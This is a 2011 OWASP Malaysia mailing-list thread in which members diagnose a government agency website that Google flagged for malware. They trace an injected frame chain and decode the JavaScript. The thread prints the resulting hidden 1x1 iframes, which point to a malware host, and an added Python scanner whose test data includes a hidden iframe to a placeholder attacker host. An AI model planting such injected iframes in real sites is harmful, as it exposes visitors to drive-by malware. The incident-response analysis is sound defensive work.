[Owasp-Malaysia] Malware Detected!

Adnan bin Mohd Shukor adnan.shukor at gmail.com
Tue Feb 8 05:00:40 EST 2011


mamp <= LOL typo.. it should be nano
js <= one of the binaries in SpiderMonkey. Get the patched version
http://blog.didierstevens.com/programs/spidermonkey/ and if you are
working on MacOS/Darwin, apply this patch
http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/

thanks

On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
<sharuzzaman at gmail.com> wrote:
> I can see 2 interesting apps/scripts:
>
> 1. mamp
> 2. /opt/analysis/js/js
>
> care to share? hopefully it is open source ;)
>
>
> On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
> <adnan.shukor at gmail.com> wrote:
>>
>> Here is my bash history:
>>
>> xanda:tmp adnan$ history
>> <snip>
>>  500  cd /tmp
>>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>>  502  wget http://www2.pkink.gov.my/indexsedc.php
>>  503  nano indexsedc.php
>>  504  wget http://www2.pkink.gov.my/indexsedc.php
>>  505  mamp indexsedc.php.1
>>  506  nano indexsedc.php.1
>>  507  wget http://www2.pkink.gov.my/sedc.php
>>  508  nano sedc.php
>>  509  wget http://www2.pkink.gov.my/default.php
>>  510  nano default.php
>>  511  nano default.php
>>  512  clear
>> <I've removed the tags and left the clean JavaScript inside>
>>  513  mv default.php default.txt
>>  514  /opt/analysis/js/js < default.txt
>>  515  cat write.log
>>  516  history
>> xanda:tmp adnan$
>>
>> Below is the output of the cat:
>> [output]
>> xanda:tmp adnan$ cat write.log
>> <iframe width="1" height="1"
>>
>> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe
>> width="1" height="1"
>>
>> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>> [/output]
>>
>>
>> Hint: you might use a modified version of SpiderMonkey to 'understand'
>> the JavaScript
>>
>> Thanks
>>
>> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> > thanks for the info..
>> > I will check all the files.
>> >
>> > how did you find it?
>> >
>> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>> > <adnan.shukor at gmail.com> wrote:
>> >>
>> >> Here is the flow:
>> >>
>> >> 1) your indexsedc.php has an iframe to sedc.php
>> >> 2) and your sedc.php has an iframe to default.php
>> >> 3) and in default.php (look at the last 2 lines), javascript will
>> >> actually create an iframe to
>> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >>
>> >> thanks :)
>> >>
>> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> > can you point...
>> >> > my index.htm or indexsedc.php or other file?
>> >> >
>> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>> >> > <adnan.shukor at gmail.com> wrote:
>> >> >>
>> >> >> you have iframe pointed to
>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >>
>> >> >> which is not xss :)
>> >> >>
>> >> >> From my personal point of view, it's either caused by:
>> >> >> 1) malware on pc which has been used for ftp/access to the server
>> >> >> 2) compromised server
>> >> >>
>> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>> >> >> mycert at mycert.org.my for further analysis :)
>> >> >>
>> >> >> thanks
>> >> >>
>> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> >> > I have checked it.
>> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com>
>> >> >> > wrote:
>> >> >> >>
>> >> >> >> Hi Mohd Symsuri,
>> >> >> >>
>> >> >> >> Why don't you check on the reason why it's being blocked, it might
>> >> >> >> help.
>> >> >> >>
>> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>> >> >> >>
>> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>> >> >> >>
>> >> >> >> Regards,
>> >> >> >> Kishur
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>> >> >> >> <msyamsuri at gmail.com>
>> >> >> >> wrote:
>> >> >> >>>
>> >> >> >>> Assalamualaikum and good day to my fellow friends.
>> >> >> >>> I need some advice.
>> >> >> >>> The web site of Perbadanan Kemajuan Iktisad Negeri Kelantan
>> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost 4 days.
>> >> >> >>> It said that we host malware on our server: "Malware Detected!" (Google
>> >> >> >>> said that!!)
>> >> >> >>> What I did is..
>> >> >> >>> 1. Scanned all the data and uploaded new data
>> >> >> >>> 2. Checked the index.html or index.php
>> >> >> >>> 3. Scanned using web scanners:
>> >> >> >>> http://www.avgthreatlabs.com/
>> >> >> >>> http://www.virustotal.com
>> >> >> >>> but it still gets blocked..
>> >> >> >>> Google said "Suspected injected code":
>> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>> >> >> >>> NAME="confcontent"
>> >> >> >>> scrolling=yes >
>> >> >> >>> I have been using this code for almost 2 years.
>> >> >> >>> What should I do now?
>> >> >> >>>
>> >> >> >>> --
>> >> >> >>> best regard
>> >> >> >>> syamsuri
>> >> >> >>>
>> >> >> >>>
>> >> >> >>>
>> >> >> >>> _______________________________________________
>> >> >> >>> Owasp-Malaysia mailing list
>> >> >> >>> Owasp-Malaysia at lists.owasp.org
>> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >>>
>> >> >> >>> OWASP Malaysia Wiki
>> >> >> >>> http://www.owasp.org/index.php/Malaysia
>> >> >> >>>
>> >> >> >>> OWASP Malaysia Wiki Facebook
>> >> >> >>>
>> >> >> >>>
>> >> >> >>>
>> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >>
>> >> >> >>
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > --
>> >> >> > best regard
>> >> >> > syamsuri
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > best regard
>> >> > syamsuri
>> >> >
>> >> >
>> >> >
>> >> >
>> >
>> >
>> >
>> > --
>> > best regard
>> > syamsuri
>> >
>> >
>> >
>> >
>
>
>
> --
> Sharuzzaman Ahmat Raslan
>
>
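As an added example (not code from anyone in this thread), a small Python scanner that walks the frame/iframe chain Adnan describes (index -> indexsedc.php -> sedc.php -> default.php -> off-site payload) over a constructed copy of the site, flagging 1x1 hidden frames and the hop that leaves the trusted hosts. The SITE contents and the attacker.example host are constructed placeholders; genuinely obfuscated JavaScript would still need the SpiderMonkey step above to reveal its document.write output.

```python
import re
from urllib.parse import urlparse

TRUSTED_HOSTS = {"www.pkink.gov.my", "www2.pkink.gov.my"}  # from the thread; anything else is off-site

# Constructed stand-in for the infected files; attacker.example is a placeholder host.
SITE = {
    "index.htm": '<FRAME SRC="http://www2.pkink.gov.my/indexsedc.php" NAME="confcontent" scrolling=yes >',
    "indexsedc.php": '<html><body>Hello<iframe src="sedc.php"></iframe></body></html>',
    "sedc.php": '<iframe width="1" height="1" src="http://www2.pkink.gov.my/default.php"></iframe>',
    "default.php": '<script>document.write("<iframe width=\\"1\\" height=\\"1\\" '
                   'src=\\"http://attacker.example/payload\\"></iframe>")</script>',
}

TAG_RE = re.compile(r"<\s*(i?frame)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def find_frames(html):
    """(tag, attrs) per <frame>/<iframe>; escaped quotes are unescaped first so a frame
    emitted by a plain document.write("...") string literal is seen as well."""
    html = html.replace('\\"', '"').replace("\\'", "'")
    return [(m.group(1).lower(),
             {k.lower(): (a or b or c) for k, a, b, c in ATTR_RE.findall(m.group(2))})
            for m in TAG_RE.finditer(html)]

def is_hidden(attrs):
    """True when width and height are both declared and at most 1 pixel."""
    try:
        return all(d in attrs and int(attrs[d].strip("px")) <= 1 for d in ("width", "height"))
    except ValueError:          # e.g. "100%"
        return False

def local_path(src):
    """Site-relative path of a frame target, or None when it leaves the trusted hosts."""
    u = urlparse(src)
    if u.netloc and u.netloc.lower() not in TRUSTED_HOSTS:
        return None
    return u.path.lstrip("/")

def follow_chain(site, start):
    """Follow the first frame in each file; returns [(file, src, hidden), ...]."""
    chain, seen, current = [], set(), start
    while current and current not in seen:   # stops on off-site hop, missing file or cycle
        seen.add(current)
        frames = find_frames(site.get(current, ""))
        if not frames:
            break
        attrs = frames[0][1]
        src = attrs.get("src", "")
        chain.append((current, src, is_hidden(attrs)))
        current = local_path(src)   # None => payload hop, chain ends here
    return chain
```

Run `follow_chain(SITE, "index.htm")` against a real web root by loading each file's contents into the dict; every hop flagged hidden or off-site is a file to inspect.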

